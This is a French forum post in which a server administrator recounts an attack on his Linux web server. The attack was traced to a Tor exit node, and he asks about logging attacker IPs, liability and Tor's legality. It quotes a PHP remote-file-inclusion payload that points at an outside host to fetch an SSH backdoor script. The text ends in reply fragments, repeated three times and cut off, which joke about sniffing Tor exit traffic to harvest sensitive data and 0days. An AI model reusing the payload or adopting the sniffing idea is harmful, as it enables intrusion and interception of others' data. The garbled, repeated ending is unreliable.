récemment, une personne sans doute mal intentionnée a cherché à attaquer
un serveur web que j'administre. (Serveur sous Linux, bien à jour,
firewallé et tout ce qui s'en suit).
Les attaques vers les serveurs internet sont choses courantes, j'en
enregistre (vive Snort) plus de mille par jour, souvent de simples scans
nmap ou des attaques de machines infestées par des vers, et cetera. Rien
d'alarmant en somme.
Cette fois l'attaque en question a consisté à faire un full scan des
ports ouverts, de quelques tests de vulnérabilité sur les ports smtp,
dns, pop et http, et enfin, d'une tentative d'injection de code PHP sur
une des pages, du genre passage de paramètres comme :
popup.php?page=http://scriptkiddieland.com/install_passwordless_ssh.txt
Cela signifie je pense que l'attaquant en question connaissait le site
web qu'héberge ce serveur (ou s'y est vraiment interessé de près) et n'a
pas juste attaqué une IP au hasard.
Habituellement, quand je remarque une telle attaque, je regarde la
localisation de l'ip et la compare avec celles de mes bases de données,
pour essayer d'identifier la personne mal intentionnée et éventuellement
lui remonter les bretelles si je dispose de son mail, etc.
Cette fois, l'ip correspondait à un serveur hébergé à l'université
d'Harvard, en me rendant sur le site j'ai pu facilement trouver l'email
de l'admin de la machine, et lui ai demandé poliment de vérifier que sa
machine n'était pas trouée et de faire le nécessaire pour que l'on
n'attaque plus mon serveur à partir de son IP.
Sa réponse ne manque pas d'éloquance, il m'explique qu'il ne peut pas me
donner l'identité de l'attaquant ni même une IP, pour la simple raison
que sa machine est un noeud 'exit' d'un réseau TOR, qui est apparemment
un anonymiseur TCP qui sert justement à empecher que l'on remonte à
l'IP d'origine d'une connexion. sic .
Voilà, désolé pour le résumé un peu long, voici les questions que je me
pose :
- Est il vraiment utile de garder les IPs utilisées lors des
attaques "sérieuses" que subit un serveur, ou est ce complètement vain
- Au cas où une attaque réussirait et qu'un serveur serait
rootkité puis utilisé à des fins peu louables, l'adresse IP du hacker
peut elle m'être utile pour espérer un dedomagement
- Ce réseau d'anonymiseur TOR , c'est le système rêvé pour
attaquer n'importe qui en toute impunité et avec les pires vilainies qui
soient non? C'est légal?
- Si une attaque à partir de ce réseau TOR fini par faire tomber
un serveur, qui dois-je considérer comme responsable ?
sniffer tout ce qui passe par lui. Ce qui est d'autant plus tentant que l'on sait qu'il y a des chances pour récupérer des informations sensibles.
Ca peux éventuellement être sympa pour récupérer quelques 0day, on se doute que ces réseaux ne sont pas peuplés de gentils surfeurs dans leur majorité :)
sniffer tout ce qui passe par lui. Ce qui est d'autant plus tentant
que l'on sait qu'il y a des chances pour récupérer des informations
sensibles.
Ca peux éventuellement être sympa pour récupérer quelques 0day, on se
doute que ces réseaux ne sont pas peuplés de gentils surfeurs dans leur
majorité :)
sniffer tout ce qui passe par lui. Ce qui est d'autant plus tentant que l'on sait qu'il y a des chances pour récupérer des informations sensibles.
Ca peux éventuellement être sympa pour récupérer quelques 0day, on se doute que ces réseaux ne sont pas peuplés de gentils surfeurs dans leur majorité :)
